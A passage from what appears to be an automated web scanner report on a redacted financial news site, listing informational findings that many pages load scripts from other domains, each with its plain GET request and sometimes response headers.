http://img.widgets.video.s-redacted/js/embed.js

Request

GET /common/sitemap.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.166. http://money.redacted/common/welcome-to-the-new-msn-money.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/common/welcome-to-the-new-msn-money.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /common/welcome-to-the-new-msn-money.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.167. http://money.redacted/credit-and-debt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/credit-and-debt

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /credit-and-debt HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.168. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=4d8ce924396e4151b191c200b28be405; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:59 GMT
Content-Length: 81669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.169. http://money.redacted/currency/2011-the-year-of-wild-speculation-fleckenstein.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/currency/2011-the-year-of-wild-speculation-fleckenstein.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /currency/2011-the-year-of-wild-speculation-fleckenstein.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.170. http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/currency/currency-clash-dollar-vs-euro-smartmoney.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=a96ec68b7d3a41e88ae91566940da75a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:57 GMT
Content-Length: 70397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.171. http://money.redacted/exchange-traded-fund previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/exchange-traded-fund

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /exchange-traded-fund HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.172. http://money.redacted/exchange-traded-fund/the-case-for-actively-managed-ETFs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/exchange-traded-fund/the-case-for-actively-managed-ETFs.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /exchange-traded-fund/the-case-for-actively-managed-ETFs.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.173. http://money.redacted/how-to-invest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /how-to-invest HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.174. http://money.redacted/how-to-invest/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/default-dyn.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /how-to-invest/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.175. http://money.redacted/how-to-invest/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /how-to-invest/default.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.176. http://money.redacted/how-to-invest/how-to-invest-in-a-zigzag-economy-jubak.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/how-to-invest-in-a-zigzag-economy-jubak.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /how-to-invest/how-to-invest-in-a-zigzag-economy-jubak.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.177. http://money.redacted/how-to-invest/invest-like-warren-buffett-in-2011-ap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/invest-like-warren-buffett-in-2011-ap.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /how-to-invest/invest-like-warren-buffett-in-2011-ap.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.178. http://money.redacted/how-to-invest/start-investing-with-just-100-dollars.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/start-investing-with-just-100-dollars.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /how-to-invest/start-investing-with-just-100-dollars.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.179. http://money.redacted/how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /how-to-invest/super-bowl-theory-says-to-go-long-marketwatch.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.180. http://money.redacted/how-to-invest/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/video.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /how-to-invest/video.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.181. http://money.redacted/how-to-invest/what-you-did-not-learn-from-the-crash-weston.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/what-you-did-not-learn-from-the-crash-weston.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /how-to-invest/what-you-did-not-learn-from-the-crash-weston.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.182. http://money.redacted/identity-theft/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/identity-theft/default-dyn.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /identity-theft/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=8a19b1c37abe4adaa07e1fe54f2a83e1; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:03 GMT
Content-Length: 52097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.183. http://money.redacted/insurance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/insurance

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /insurance HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.184. http://money.redacted/investing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/investing

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

Response

23.185. http://money.redacted/investing/10-reasons-to-love-rising-prices-jubak.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/investing/10-reasons-to-love-rising-prices-jubak.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /investing/10-reasons-to-love-rising-prices-jubak.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.186. http://money.redacted/investing/stock-picks-to-change-your-life.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/investing/stock-picks-to-change-your-life.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /investing/stock-picks-to-change-your-life.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.187. http://money.redacted/loans previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/loans

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /loans HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.188. http://money.redacted/market-news/post.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/market-news/post.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /market-news/post.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=fc74895a2afe4dbb8b81357837158fa3; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:56 GMT
Content-Length: 43288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.189. http://money.redacted/money-video previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/money-video

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /money-video HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.190. http://money.redacted/mutual-fund previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/mutual-fund

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /mutual-fund HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.191. http://money.redacted/mutual-fund/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/mutual-fund/default-dyn.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /mutual-fund/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=78fc912bcfc74a00b174e74deda213d4; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:57 GMT
Content-Length: 60626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
